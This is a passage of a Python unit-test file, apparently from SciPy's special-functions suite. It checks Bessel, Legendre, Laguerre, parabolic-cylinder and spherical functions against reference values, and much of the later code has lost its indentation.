                        11.7915344391, 14.9309177086]), 4)
        assert_array_almost_equal(
            jn1, array([3.83171, 7.01559, 10.17347, 13.32369, 16.47063]), 4)
        # High orders exercise the asymptotic starting guesses.
        jn102 = special.jn_zeros(102, 5)
        assert_tol_equal(jn102, array([110.89174935992040343,
                                       117.83464175788308398,
                                       123.70194191713507279,
                                       129.02417238949092824,
                                       134.00114761868422559]), rtol=1e-13)
        jn301 = special.jn_zeros(301, 5)
        assert_tol_equal(jn301, array([313.59097866698830153,
                                       323.21549776096288280,
                                       331.22338738656748796,
                                       338.39676338872084500,
                                       345.03284233056064157]), rtol=1e-13)

    def test_jn_zeros_slow(self):
        jn0 = special.jn_zeros(0, 300)
        assert_tol_equal(jn0[260-1], 816.02884495068867280, rtol=1e-13)
        assert_tol_equal(jn0[280-1], 878.86068707124422606, rtol=1e-13)
        assert_tol_equal(jn0[300-1], 941.69253065317954064, rtol=1e-13)
        jn10 = special.jn_zeros(10, 300)
        assert_tol_equal(jn10[260-1], 831.67668514305631151, rtol=1e-13)
        assert_tol_equal(jn10[280-1], 894.51275095371316931, rtol=1e-13)
        assert_tol_equal(jn10[300-1], 957.34826370866539775, rtol=1e-13)
        jn3010 = special.jn_zeros(3010, 5)
        assert_tol_equal(jn3010, array([3036.86590780927,
                                        3057.06598526482,
                                        3073.66360690272,
                                        3088.37736494778,
                                        3101.86438139042]), rtol=1e-8)

    def test_jnjnp_zeros(self):
        jn = special.jn

        def jnp(n, x):
            # Derivative via the standard recurrence.
            return (jn(n-1, x) - jn(n+1, x)) / 2

        for nt in range(1, 30):
            z, n, m, t = special.jnjnp_zeros(nt)
            for zz, nn, tt in zip(z, n, t):
                if tt == 0:
                    assert_allclose(jn(nn, zz), 0, atol=1e-6)
                elif tt == 1:
                    assert_allclose(jnp(nn, zz), 0, atol=1e-6)
                else:
                    raise AssertionError("Invalid t return for nt=%d" % nt)

    def test_jnp_zeros(self):
        jnp_z = special.jnp_zeros(1, 5)
        assert_array_almost_equal(
            jnp_z, array([1.84118, 5.33144, 8.53632, 11.70600, 14.86359]), 4)
        jnp_z = special.jnp_zeros(443, 5)
        assert_tol_equal(special.jvp(443, jnp_z), 0, atol=1e-15)

    def test_jnyn_zeros(self):
        # jnyn_zeros returns (J zeros, J' zeros, Y zeros, Y' zeros).
        jnyn = special.jnyn_zeros(1, 5)
        assert_array_almost_equal(
            jnyn,
            (array([3.83171, 7.01559, 10.17347, 13.32369, 16.47063]),
             array([1.84118, 5.33144, 8.53632, 11.70600, 14.86359]),
             array([2.19714, 5.42968, 8.59601, 11.74915, 14.89744]),
             array([3.68302, 6.94150, 10.12340, 13.28576, 16.44006])), 5)

    def test_jvp(self):
        # J'_2 from the recurrence (J_1 - J_3)/2.
        expected = (special.jv(1, 2) - special.jv(3, 2)) / 2
        assert_almost_equal(special.jvp(2, 2), expected, 10)

    def test_k0(self):
        assert_almost_equal(special.k0(.1), special.kv(0, .1), 8)

    def test_k0e(self):
        assert_almost_equal(special.k0e(.1), special.kve(0, .1), 8)

    def test_k1(self):
        assert_almost_equal(special.k1(.1), special.kv(1, .1), 8)

    def test_k1e(self):
        assert_almost_equal(special.k1e(.1), special.kve(1, .1), 8)

    def test_jacobi(self):
        # Random admissible parameters; compare against the explicit
        # low-degree Jacobi polynomial coefficients.
        a = 5*rand() - 1
        b = 5*rand() - 1
        P0 = special.jacobi(0, a, b)
        P1 = special.jacobi(1, a, b)
        P2 = special.jacobi(2, a, b)
        P3 = special.jacobi(3, a, b)
        assert_array_almost_equal(P0.c, [1], 13)
        assert_array_almost_equal(P1.c, array([a+b+2, a-b])/2.0, 13)
        cp = [(a+b+3)*(a+b+4), 4*(a+b+3)*(a+2), 4*(a+1)*(a+2)]
        p2c = [cp[0], cp[1]-2*cp[0], cp[2]-cp[1]+cp[0]]
        assert_array_almost_equal(P2.c, array(p2c)/8.0, 13)
        cp = [(a+b+4)*(a+b+5)*(a+b+6), 6*(a+b+4)*(a+b+5)*(a+3),
              12*(a+b+4)*(a+2)*(a+3), 8*(a+1)*(a+2)*(a+3)]
        p3c = [cp[0], cp[1]-3*cp[0], cp[2]-2*cp[1]+3*cp[0],
               cp[3]-cp[2]+cp[1]-cp[0]]
        assert_array_almost_equal(P3.c, array(p3c)/48.0, 13)

    def test_kn(self):
        assert_almost_equal(special.kn(0, .2), 1.7527038555281462, 8)

    def test_negv_kv(self):
        # K_v is even in the order.
        assert_equal(special.kv(3.0, 2.2), special.kv(-3.0, 2.2))

    def test_kv0(self):
        assert_almost_equal(special.kv(0, .2), 1.7527038555281462, 10)

    def test_kv1(self):
        assert_almost_equal(special.kv(1, 0.2), 4.775972543220472, 10)

    def test_kv2(self):
        assert_almost_equal(special.kv(2, 0.2), 49.51242928773287, 10)

    def test_negv_kve(self):
        assert_equal(special.kve(3.0, 2.2), special.kve(-3.0, 2.2))

    def test_kve(self):
        # kve(v, z) = kv(v, z) * exp(z), for real and complex z.
        assert_almost_equal(special.kve(0, .2),
                            special.kv(0, .2) * exp(.2), 8)
        z = .2 + 1j
        assert_almost_equal(special.kve(0, z), special.kv(0, z) * exp(z), 8)

    def test_kvp_v0n1(self):
        z = 2.2
        # K0' = -K1
        assert_almost_equal(-special.kv(1, z), special.kvp(0, z, n=1), 10)

    def test_kvp_n1(self):
        v = 3.
        z = 2.2
        expected = -special.kv(v+1, z) + v/z*special.kv(v, z)
        assert_almost_equal(expected, special.kvp(v, z, n=1), 10)  # this function (kvp) is broken

    def test_kvp_n2(self):
        v = 3.
        z = 2.2
        expected = (z**2+v**2-v)/z**2 * special.kv(v, z) + special.kv(v+1, z)/z
        assert_almost_equal(expected, special.kvp(v, z, n=2), 10)

    def test_y0(self):
        assert_almost_equal(special.y0(.1), special.yn(0, .1), 8)

    def test_y1(self):
        assert_almost_equal(special.y1(.1), special.yn(1, .1), 8)

    def test_y0_zeros(self):
        yo, ypo = special.y0_zeros(2)
        zo, zpo = special.y0_zeros(2, complex=1)
        all = r_[yo, zo]
        allval = r_[ypo, zpo]
        # Y0 vanishes at its zeros; Y1 there equals the reported Y0'.
        assert_array_almost_equal(abs(special.yv(0.0, all)), 0.0, 11)
        assert_array_almost_equal(abs(special.yv(1, all) - allval), 0.0, 11)

    def test_y1_zeros(self):
        assert_array_almost_equal(special.y1_zeros(1),
                                  (array([2.19714]), array([0.52079])), 5)

    def test_y1p_zeros(self):
        assert_array_almost_equal(special.y1p_zeros(1, complex=1),
                                  (array([0.5768+0.904j]),
                                   array([-0.7635+0.5892j])), 3)

    def test_yn_zeros(self):
        zeros_yn = special.yn_zeros(4, 2)
        assert_array_almost_equal(zeros_yn, array([5.64515, 9.36162]), 5)
        zeros_yn = special.yn_zeros(443, 5)
        assert_tol_equal(zeros_yn,
                         [450.13573091578090314, 463.05692376675001542,
                          472.80651546418663566, 481.27353184725625838,
                          488.98055964441374646], rtol=1e-15)

    def test_ynp_zeros(self):
        zeros_ynp = special.ynp_zeros(0, 2)
        assert_array_almost_equal(zeros_ynp,
                                  array([2.19714133, 5.42968104]), 6)
        zeros_ynp = special.ynp_zeros(43, 5)
        assert_tol_equal(special.yvp(43, zeros_ynp), 0, atol=1e-15)
        zeros_ynp = special.ynp_zeros(443, 5)
        assert_tol_equal(special.yvp(443, zeros_ynp), 0, atol=1e-9)

    @dec.knownfailureif(True,
                        "cephes/yv is not eps accurate for large orders on "
                        "all platforms, and has nan/inf issues")
    def test_ynp_zeros_large_order(self):
        zeros_ynp = special.ynp_zeros(443, 5)
        assert_tol_equal(special.yvp(443, zeros_ynp), 0, atol=1e-15)

    def test_yn(self):
        assert_almost_equal(special.yn(1, .2), -3.3238249881118471, 8)

    def test_negv_yv(self):
        assert_almost_equal(special.yv(-3, 2), -special.yv(3, 2), 14)

    def test_yv(self):
        assert_almost_equal(special.yv(1, .2), -3.3238249881118471, 8)

    def test_negv_yve(self):
        assert_almost_equal(special.yve(-3, 2), -special.yve(3, 2), 14)

    def test_yve(self):
        assert_almost_equal(special.yve(1, .2), -3.3238249881118471, 8)
        expected = special.yv(1, .2 + 1j) * exp(-1)
        assert_almost_equal(special.yve(1, .2 + 1j), expected, 8)

    def test_yvp(self):
        # Y'_2 from the recurrence (Y_1 - Y_3)/2.
        expected = (special.yv(1, .2) - special.yv(3, .2)) / 2.0
        assert_array_almost_equal(special.yvp(2, .2), expected, 10)

    def _cephes_vs_amos_points(self):
        """Yield (order, argument) pairs for Cephes-vs-AMOS comparison."""
        # check several points, including large-amplitude ones
        for v in [-120, -100.3, -20., -10., -1., -.5,
                  0., 1., 12.49, 120., 301]:
            for z in [-1300, -11, -10, -1, 1., 10., 200.5, 401., 600.5,
                      700.6, 1300, 10003]:
                yield v, z
        # check half-integers; these are problematic points at least
        # for cephes/iv
        for v in 0.5 + arange(-60, 60):
            yield v, 3.5

    def check_cephes_vs_amos(self, f1, f2, rtol=1e-11, atol=0, skip=None):
        # f1 on real args hits Cephes; f1 on complex args and f2 on
        # integer orders route to AMOS.  All routes must agree.
        for v, z in self._cephes_vs_amos_points():
            if skip is not None and skip(v, z):
                continue
            c1, c2, c3 = f1(v, z), f1(v, z + 0j), f2(int(v), z)
            if np.isinf(c1):
                assert_(np.abs(c2) >= 1e300, (v, z))
            elif np.isnan(c1):
                assert_(c2.imag != 0, (v, z))
            else:
                assert_tol_equal(c1, c2, err_msg=(v, z), rtol=rtol, atol=atol)
                if v == int(v):
                    assert_tol_equal(c3, c2, err_msg=(v, z),
                                     rtol=rtol, atol=atol)

    def test_jv_cephes_vs_amos(self):
        self.check_cephes_vs_amos(special.jv, special.jn,
                                  rtol=1e-10, atol=1e-305)

    @dec.knownfailureif(True,
                        "cephes/yv is not eps accurate for large orders on "
                        "all platforms, and has nan/inf issues")
    def test_yv_cephes_vs_amos(self):
        self.check_cephes_vs_amos(special.yv, special.yn,
                                  rtol=1e-11, atol=1e-305)

    def test_yv_cephes_vs_amos_only_small_orders(self):
        skipper = lambda v, z: (abs(v) > 50)
        self.check_cephes_vs_amos(special.yv, special.yn,
                                  rtol=1e-11, atol=1e-305, skip=skipper)

    def test_iv_cephes_vs_amos(self):
        olderr = np.seterr(all='ignore')
        try:
            self.check_cephes_vs_amos(special.iv, special.iv,
                                      rtol=5e-9, atol=1e-305)
        finally:
            np.seterr(**olderr)

    @dec.slow
    def test_iv_cephes_vs_amos_mass_test(self):
        N = 1000000
        np.random.seed(1)
        v = np.random.pareto(0.5, N) * (-1)**np.random.randint(2, size=N)
        x = np.random.pareto(0.2, N) * (-1)**np.random.randint(2, size=N)
        imsk = (np.random.randint(8, size=N) == 0)
        v[imsk] = v.astype(int)
        c1 = special.iv(v, x)
        c2 = special.iv(v, x+0j)
        # deal with differences in the inf cutoffs
        c1[abs(c1) > 1e300] = np.inf
        c2[abs(c2) > 1e300] = np.inf
        dc = abs(c1/c2 - 1)
        dc[np.isnan(dc)] = 0
        k = np.argmax(dc)
        # Most error apparently comes from AMOS and not our implementation;
        # there are some problems near integer orders there
        assert_(dc[k] < 1e-9, (v[k], x[k], special.iv(v[k], x[k]), special.iv(v[k], x[k]+0j)))

    def test_kv_cephes_vs_amos(self):
        #self.check_cephes_vs_amos(kv, kn, rtol=1e-9, atol=1e-305)
        self.check_cephes_vs_amos(special.kv, special.kv,
                                  rtol=1e-9, atol=1e-305)

    def test_ticket_623(self):
        assert_tol_equal(special.jv(3, 4), 0.43017147387562193)
        assert_tol_equal(special.jv(301, 1300), 0.0183487151115275)
        assert_tol_equal(special.jv(301, 1296.0682), -0.0224174325312048)
def test_ticket_853(self):
"""Negative-order Bessels"""
# cephes
assert_tol_equal(special.jv(-1, 1 ), -0.4400505857449335)
assert_tol_equal(special.jv(-2, 1 ), 0.1149034849319005)
assert_tol_equal(special.yv(-1, 1 ), 0.7812128213002887)
assert_tol_equal(special.yv(-2, 1 ), -1.650682606816255)
assert_tol_equal(special.iv(-1, 1 ), 0.5651591039924851)
assert_tol_equal(special.iv(-2, 1 ), 0.1357476697670383)
assert_tol_equal(special.kv(-1, 1 ), 0.6019072301972347)
assert_tol_equal(special.kv(-2, 1 ), 1.624838898635178)
assert_tol_equal(special.jv(-0.5, 1 ), 0.43109886801837607952)
assert_tol_equal(special.yv(-0.5, 1 ), 0.6713967071418031)
assert_tol_equal(special.iv(-0.5, 1 ), 1.231200214592967)
assert_tol_equal(special.kv(-0.5, 1 ), 0.4610685044478945)
# amos
assert_tol_equal(special.jv(-1, 1+0j), -0.4400505857449335)
assert_tol_equal(special.jv(-2, 1+0j), 0.1149034849319005)
assert_tol_equal(special.yv(-1, 1+0j), 0.7812128213002887)
assert_tol_equal(special.yv(-2, 1+0j), -1.650682606816255)
assert_tol_equal(special.iv(-1, 1+0j), 0.5651591039924851)
assert_tol_equal(special.iv(-2, 1+0j), 0.1357476697670383)
assert_tol_equal(special.kv(-1, 1+0j), 0.6019072301972347)
assert_tol_equal(special.kv(-2, 1+0j), 1.624838898635178)
assert_tol_equal(special.jv(-0.5, 1+0j), 0.43109886801837607952)
assert_tol_equal(special.jv(-0.5, 1+1j), 0.2628946385649065-0.827050182040562j)
assert_tol_equal(special.yv(-0.5, 1+0j), 0.6713967071418031)
assert_tol_equal(special.yv(-0.5, 1+1j), 0.967901282890131+0.0602046062142816j)
assert_tol_equal(special.iv(-0.5, 1+0j), 1.231200214592967)
assert_tol_equal(special.iv(-0.5, 1+1j), 0.77070737376928+0.39891821043561j)
assert_tol_equal(special.kv(-0.5, 1+0j), 0.4610685044478945)
assert_tol_equal(special.kv(-0.5, 1+1j), 0.06868578341999-0.38157825981268j)
assert_tol_equal(special.jve(-0.5,1+0.3j), special.jv(-0.5, 1+0.3j)*exp(-0.3))
assert_tol_equal(special.yve(-0.5,1+0.3j), special.yv(-0.5, 1+0.3j)*exp(-0.3))
assert_tol_equal(special.ive(-0.5,0.3+1j), special.iv(-0.5, 0.3+1j)*exp(-0.3))
assert_tol_equal(special.kve(-0.5,0.3+1j), special.kv(-0.5, 0.3+1j)*exp(0.3+1j))
assert_tol_equal(special.hankel1(-0.5, 1+1j), special.jv(-0.5, 1+1j) + 1j*special.yv(-0.5,1+1j))
assert_tol_equal(special.hankel2(-0.5, 1+1j), special.jv(-0.5, 1+1j) - 1j*special.yv(-0.5,1+1j))
def test_ticket_854(self):
"""Real-valued Bessel domains"""
assert_(isnan(special.jv(0.5, -1)))
assert_(isnan(special.iv(0.5, -1)))
assert_(isnan(special.yv(0.5, -1)))
assert_(isnan(special.yv(1, -1)))
assert_(isnan(special.kv(0.5, -1)))
assert_(isnan(special.kv(1, -1)))
assert_(isnan(special.jve(0.5, -1)))
assert_(isnan(special.ive(0.5, -1)))
assert_(isnan(special.yve(0.5, -1)))
assert_(isnan(special.yve(1, -1)))
assert_(isnan(special.kve(0.5, -1)))
assert_(isnan(special.kve(1, -1)))
assert_(isnan(special.airye(-1)[0:2]).all(), special.airye(-1))
assert_(not isnan(special.airye(-1)[2:4]).any(), special.airye(-1))
def test_ticket_503(self):
"""Real-valued Bessel I overflow"""
assert_tol_equal(special.iv(1, 700), 1.528500390233901e302)
assert_tol_equal(special.iv(1000, 1120), 1.301564549405821e301)
def test_iv_hyperg_poles(self):
assert_tol_equal(special.iv(-0.5, 1), 1.231200214592967)
def iv_series(self, v, z, n=200):
k = arange(0, n).astype(float_)
r = (v+2*k)*log(.5*z) - special.gammaln(k+1) - special.gammaln(v+k+1)
r[isnan(r)] = inf
r = exp(r)
err = abs(r).max() * finfo(float_).eps * n + abs(r[-1])*10
return r.sum(), err
def test_i0_series(self):
for z in [1., 10., 200.5]:
value, err = self.iv_series(0, z)
assert_tol_equal(special.i0(z), value, atol=err, err_msg=z)
def test_i1_series(self):
for z in [1., 10., 200.5]:
value, err = self.iv_series(1, z)
assert_tol_equal(special.i1(z), value, atol=err, err_msg=z)
def test_iv_series(self):
for v in [-20., -10., -1., 0., 1., 12.49, 120.]:
for z in [1., 10., 200.5, -1+2j]:
value, err = self.iv_series(v, z)
assert_tol_equal(special.iv(v, z), value, atol=err, err_msg=(v, z))
def test_i0(self):
values = [[0.0, 1.0],
[1e-10, 1.0],
[0.1, 0.9071009258],
[0.5, 0.6450352706],
[1.0, 0.4657596077],
[2.5, 0.2700464416],
[5.0, 0.1835408126],
[20.0, 0.0897803119],
]
for i, (x, v) in enumerate(values):
cv = special.i0(x) * exp(-x)
assert_almost_equal(cv, v, 8, err_msg='test #%d' % i)
def test_i0e(self):
oize = special.i0e(.1)
oizer = special.ive(0,.1)
assert_almost_equal(oize,oizer,8)
def test_i1(self):
values = [[0.0, 0.0],
[1e-10, 0.4999999999500000e-10],
[0.1, 0.0452984468],
[0.5, 0.1564208032],
[1.0, 0.2079104154],
[5.0, 0.1639722669],
[20.0, 0.0875062222],
]
for i, (x, v) in enumerate(values):
cv = special.i1(x) * exp(-x)
assert_almost_equal(cv, v, 8, err_msg='test #%d' % i)
def test_i1e(self):
oi1e = special.i1e(.1)
oi1er = special.ive(1,.1)
assert_almost_equal(oi1e,oi1er,8)
def test_iti0k0(self):
iti0 = array(special.iti0k0(5))
assert_array_almost_equal(iti0,array([31.848667776169801, 1.5673873907283657]),5)
def test_it2i0k0(self):
it2k = special.it2i0k0(.1)
assert_array_almost_equal(it2k,array([0.0012503906973464409, 3.3309450354686687]),6)
def test_iv(self):
iv1 = special.iv(0,.1)*exp(-.1)
assert_almost_equal(iv1,0.90710092578230106,10)
def test_negv_ive(self):
assert_equal(special.ive(3,2), special.ive(-3,2))
def test_ive(self):
ive1 = special.ive(0,.1)
iv1 = special.iv(0,.1)*exp(-.1)
assert_almost_equal(ive1,iv1,10)
def test_ivp0(self):
assert_almost_equal(special.iv(1,2), special.ivp(0,2), 10)
def test_ivp(self):
y=(special.iv(0,2) + special.iv(2,2))/2
x = special.ivp(1,2)
assert_almost_equal(x,y,10)
class TestLaguerre(TestCase):
    def test_laguerre(self):
        """First six Laguerre polynomials against closed-form coefficients."""
        polynomials = [special.laguerre(n) for n in range(6)]
        expected_coeffs = [
            [1],
            [-1, 1],
            array([1, -4, 2]) / 2.0,
            array([-1, 9, -18, 6]) / 6.0,
            array([1, -16, 72, -96, 24]) / 24.0,
            array([-1, 25, -200, 600, -600, 120]) / 120.0,
        ]
        for poly, coeffs in zip(polynomials, expected_coeffs):
            assert_array_almost_equal(poly.c, coeffs, 13)

    def test_genlaguerre(self):
        """Generalized Laguerre L_n^(k) for a random parameter k in (-0.9, 4.1)."""
        k = 5 * rand() - 0.9
        lag = [special.genlaguerre(n, k) for n in range(4)]
        assert_equal(lag[0].c, [1])
        assert_equal(lag[1].c, [-1, k + 1])
        assert_almost_equal(lag[2].c,
                            array([1, -2 * (k + 2), (k + 1.) * (k + 2.)]) / 2.0)
        assert_almost_equal(
            lag[3].c,
            array([-1, 3 * (k + 3), -3 * (k + 2) * (k + 3),
                   (k + 1) * (k + 2) * (k + 3)]) / 6.0)
# Base polynomials come from Abrahmowitz and Stegan
class TestLegendre(TestCase):
def test_legendre(self):
leg0 = special.legendre(0)
leg1 = special.legendre(1)
leg2 = special.legendre(2)
leg3 = special.legendre(3)
leg4 = special.legendre(4)
leg5 = special.legendre(5)
assert_equal(leg0.c,[1])
assert_equal(leg1.c,[1,0])
assert_equal(leg2.c,array([3,0,-1])/2.0)
assert_almost_equal(leg3.c,array([5,0,-3,0])/2.0)
assert_almost_equal(leg4.c,array([35,0,-30,0,3])/8.0)
assert_almost_equal(leg5.c,array([63,0,-70,0,15,0])/8.0)
class TestLambda(TestCase):
def test_lmbda(self):
lam = special.lmbda(1,.1)
lamr = (array([special.jn(0,.1), 2*special.jn(1,.1)/.1]),
array([special.jvp(0,.1), -2*special.jv(1,.1)/.01 + 2*special.jvp(1,.1)/.1]))
assert_array_almost_equal(lam,lamr,8)
class TestLog1p(TestCase):
def test_log1p(self):
l1p = (special.log1p(10), special.log1p(11), special.log1p(12))
l1prl = (log(11), log(12), log(13))
assert_array_almost_equal(l1p,l1prl,8)
def test_log1pmore(self):
l1pm = (special.log1p(1), special.log1p(1.1), special.log1p(1.2))
l1pmrl = (log(2),log(2.1),log(2.2))
assert_array_almost_equal(l1pm,l1pmrl,8)
class TestLegendreFunctions(TestCase):
    """Tests for Legendre functions of the first and second kind."""

    def test_lpmn(self):
        """Associated Legendre values and derivatives from lpmn at x = 0.5."""
        lp = special.lpmn(0, 2, .5)
        assert_array_almost_equal(lp, (array([[1.00000, 0.50000, -0.12500]]),
                                       array([[0.00000, 1.00000, 1.50000]])), 4)

    def test_lpn(self):
        """Legendre polynomial values and derivatives from lpn at x = 0.5."""
        lpnf = special.lpn(2, .5)
        assert_array_almost_equal(lpnf, (array([1.00000, 0.50000, -0.12500]),
                                         array([0.00000, 1.00000, 1.50000])), 4)

    def test_lpmv(self):
        """lpmv spot values, plus an out-of-domain check."""
        lp = special.lpmv(0, 2, .5)
        assert_almost_equal(lp, -0.125, 7)
        lp = special.lpmv(0, 40, .001)
        assert_almost_equal(lp, 0.1252678976534484, 7)
        # XXX: this is outside the domain of the current implementation,
        # so ensure it returns a NaN rather than a wrong answer.
        olderr = np.seterr(all='ignore')
        try:
            lp = special.lpmv(-1, -1, .001)
        finally:
            np.seterr(**olderr)
        assert_(lp != 0 or np.isnan(lp))

    def test_lqmn(self):
        """lqmn with m = 0 must agree with lqn."""
        # BUG FIX: the lqmn call was duplicated; one evaluation suffices.
        lqmnf = special.lqmn(0, 2, .5)
        lqf = special.lqn(2, .5)
        assert_array_almost_equal(lqmnf[0][0], lqf[0], 4)
        assert_array_almost_equal(lqmnf[1][0], lqf[1], 4)

    def test_lqmn_shape(self):
        """Output arrays are (m+1, n+1); n is floored at 1 column-wise."""
        a, b = special.lqmn(4, 4, 1.1)
        assert_equal(a.shape, (5, 5))
        assert_equal(b.shape, (5, 5))

        a, b = special.lqmn(4, 0, 1.1)
        assert_equal(a.shape, (5, 1))
        assert_equal(b.shape, (5, 1))

    def test_lqn(self):
        """lqn spot values at x = 0.5."""
        lqf = special.lqn(2, .5)
        assert_array_almost_equal(lqf, (array([0.5493, -0.7253, -0.8187]),
                                        array([1.3333, 1.216, -0.8427])), 4)
class TestMathieu(TestCase):
def test_mathieu_a(self):
pass
def test_mathieu_even_coef(self):
mc = special.mathieu_even_coef(2,5)
#Q not defined broken and cannot figure out proper reporting order
def test_mathieu_odd_coef(self):
pass
#same problem as above
class TestFresnelIntegral(TestCase):
def test_modfresnelp(self):
pass
def test_modfresnelm(self):
pass
class TestOblCvSeq(TestCase):
def test_obl_cv_seq(self):
obl = special.obl_cv_seq(0,3,1)
assert_array_almost_equal(obl,array([ -0.348602,
1.393206,
5.486800,
11.492120]),5)
class TestParabolicCylinder(TestCase):
    def test_pbdn_seq(self):
        """pbdn_seq: sequence of D_n and derivatives at x = 0.1."""
        pb = special.pbdn_seq(1,.1)
        assert_array_almost_equal(pb,(array([ 0.9975,
                                              0.0998]),
                                      array([-0.0499,
                                             0.9925])),4)

    def test_pbdv(self):
        pbv = special.pbdv(1,.2)
        # NOTE(review): 'derrl' is computed but never asserted, so this test
        # only checks that pbdv runs without raising.  Also, under Python 2,
        # '1/2' is integer division (== 0), so the recurrence value is likely
        # not what was intended — confirm before adding an assertion.
        derrl = 1/2*(.2)*special.pbdv(1,.2)[0] - special.pbdv(0,.2)[0]

    def test_pbdv_seq(self):
        """pbdv_seq must match the real part of pbdn_seq for integer order."""
        pbn = special.pbdn_seq(1,.1)
        pbv = special.pbdv_seq(1,.1)
        assert_array_almost_equal(pbv,(real(pbn[0]),real(pbn[1])),4)

    def test_pbdv_points(self):
        # simple case: D_eta(0) has a closed form via the gamma function
        eta = np.linspace(-10, 10, 5)
        z = 2**(eta/2)*np.sqrt(np.pi)/special.gamma(.5-.5*eta)
        assert_tol_equal(special.pbdv(eta, 0.)[0], z, rtol=1e-14, atol=1e-14)

        # some points
        assert_tol_equal(special.pbdv(10.34, 20.44)[0], 1.3731383034455e-32, rtol=1e-12)
        assert_tol_equal(special.pbdv(-9.53, 3.44)[0], 3.166735001119246e-8, rtol=1e-12)

    def test_pbdv_gradient(self):
        # returned derivative vs. a central finite difference over a grid
        x = np.linspace(-4, 4, 8)[:,None]
        eta = np.linspace(-10, 10, 5)[None,:]

        p = special.pbdv(eta, x)
        eps = 1e-7 + 1e-7*abs(x)
        dp = (special.pbdv(eta, x + eps)[0] - special.pbdv(eta, x - eps)[0]) / eps / 2.
        assert_tol_equal(p[1], dp, rtol=1e-6, atol=1e-6)

    def test_pbvv_gradient(self):
        # same finite-difference check for the second solution pbvv
        x = np.linspace(-4, 4, 8)[:,None]
        eta = np.linspace(-10, 10, 5)[None,:]

        p = special.pbvv(eta, x)
        eps = 1e-7 + 1e-7*abs(x)
        dp = (special.pbvv(eta, x + eps)[0] - special.pbvv(eta, x - eps)[0]) / eps / 2.
        assert_tol_equal(p[1], dp, rtol=1e-6, atol=1e-6)
class TestPolygamma(TestCase):
# from Table 6.2 (pg. 271) of A&S
def test_polygamma(self):
poly2 = special.polygamma(2,1)
poly3 = special.polygamma(3,1)
assert_almost_equal(poly2,-2.4041138063,10)
assert_almost_equal(poly3,6.4939394023,10)
class TestProCvSeq(TestCase):
def test_pro_cv_seq(self):
prol = special.pro_cv_seq(0,3,1)
assert_array_almost_equal(prol,array([ 0.319000,
2.593084,
6.533471,
12.514462]),5)
class TestPsi(TestCase):
def test_psi(self):
ps = special.psi(1)
assert_almost_equal(ps,-0.57721566490153287,8)
class TestRadian(TestCase):
def test_radian(self):
rad = special.radian(90,0,0)
assert_almost_equal(rad,pi/2.0,5)
def test_radianmore(self):
rad1 = special.radian(90,1,60)
assert_almost_equal(rad1,pi/2+0.0005816135199345904,5)
class TestRiccati(TestCase):
def test_riccati_jn(self):
jnrl = (special.sph_jn(1,.2)[0]*.2,special.sph_jn(1,.2)[0]+special.sph_jn(1,.2)[1]*.2)
ricjn = special.riccati_jn(1,.2)
assert_array_almost_equal(ricjn,jnrl,8)
def test_riccati_yn(self):
ynrl = (special.sph_yn(1,.2)[0]*.2,special.sph_yn(1,.2)[0]+special.sph_yn(1,.2)[1]*.2)
ricyn = special.riccati_yn(1,.2)
assert_array_almost_equal(ricyn,ynrl,8)
class TestRound(TestCase):
def test_round(self):
rnd = map(int,(special.round(10.1),special.round(10.4),special.round(10.5),special.round(10.6)))
# Note: According to the documentation, scipy.special.round is
# supposed to round to the nearest even number if the fractional
# part is exactly 0.5. On some platforms, this does not appear
# to work and thus this test may fail. However, this unit test is
# correctly written.
rndrl = (10,10,10,11)
assert_array_equal(rnd,rndrl)
def test_sph_harm():
# Tests derived from tables in
# http://en.wikipedia.org/wiki/Table_of_spherical_harmonics
sh = special.sph_harm
pi = np.pi
exp = np.exp
sqrt = np.sqrt
sin = np.sin
cos = np.cos
yield (assert_array_almost_equal, sh(0,0,0,0),
0.5/sqrt(pi))
yield (assert_array_almost_equal, sh(-2,2,0.,pi/4),
0.25*sqrt(15./(2.*pi))*
(sin(pi/4))**2.)
yield (assert_array_almost_equal, sh(-2,2,0.,pi/2),
0.25*sqrt(15./(2.*pi)))
yield (assert_array_almost_equal, sh(2,2,pi,pi/2),
0.25*sqrt(15/(2.*pi))*
exp(0+2.*pi*1j)*sin(pi/2.)**2.)
yield (assert_array_almost_equal, sh(2,4,pi/4.,pi/3.),
(3./8.)*sqrt(5./(2.*pi))*
exp(0+2.*pi/4.*1j)*
sin(pi/3.)**2.*
(7.*cos(pi/3.)**2.-1))
yield (assert_array_almost_equal, sh(4,4,pi/8.,pi/6.),
(3./16.)*sqrt(35./(2.*pi))*
exp(0+4.*pi/8.*1j)*sin(pi/6.)**4.)
class TestSpherical(TestCase):
def test_sph_harm(self):
# see test_sph_harm function
pass
def test_sph_in(self):
i1n = special.sph_in(1,.2)
inp0 = (i1n[0][1])
inp1 = (i1n[0][0] - 2.0/0.2 * i1n[0][1])
assert_array_almost_equal(i1n[0],array([1.0066800127054699381,
0.066933714568029540839]),12)
assert_array_almost_equal(i1n[1],[inp0,inp1],12)
def test_sph_inkn(self):
spikn = r_[special.sph_in(1,.2) + special.sph_kn(1,.2)]
inkn = r_[special.sph_inkn(1,.2)]
assert_array_almost_equal(inkn,spikn,10)
def test_sph_jn(self):
s1 = special.sph_jn(2,.2)
s10 = -s1[0][1]
s11 = s1[0][0]-2.0/0.2*s1[0][1]
s12 = s1[0][1]-3.0/0.2*s1[0][2]
assert_array_almost_equal(s1[0],[0.99334665397530607731,
0.066400380670322230863,
0.0026590560795273856680],12)
assert_array_almost_equal(s1[1],[s10,s11,s12],12)
def test_sph_jnyn(self):
jnyn = r_[special.sph_jn(1,.2) + special.sph_yn(1,.2)] # tuple addition
jnyn1 = r_[special.sph_jnyn(1,.2)]
assert_array_almost_equal(jnyn1,jnyn,9)
def test_sph_kn(self):
kn = special.sph_kn(2,.2)
kn0 = -kn[0][1]
kn1 = -kn[0][0]-2.0/0.2*kn[0][1]
kn2 = -kn[0][1]-3.0/0.2*kn[0][2]
assert_array_almost_equal(kn[0],[6.4302962978445670140,
38.581777787067402086,
585.15696310385559829],12)
assert_array_almost_equal(kn[1],[kn0,kn1,kn2],9)
def test_sph_yn(self):
sy1 = special.sph_yn(2,.2)[0][2]
sy2 = special.sph_yn(0,.2)[0][0]
sphpy = (special.sph_yn(1,.2)[0][0]-2*special.sph_yn(2,.2)[0][2])/3 #correct derivative value
assert_almost_equal(sy1,-377.52483,5)#previous values in the system
assert_almost_equal(sy2,-4.9003329,5)
sy3 = special.sph_yn(1,.2)[1][1]
assert_almost_equal(sy3,sphpy,4) #compare correct derivative val. (correct =-system val).
class TestStruve(object):
def _series(self, v, z, n=100):
"""Compute Struve function & error estimate from its power series."""
k = arange(0, n)
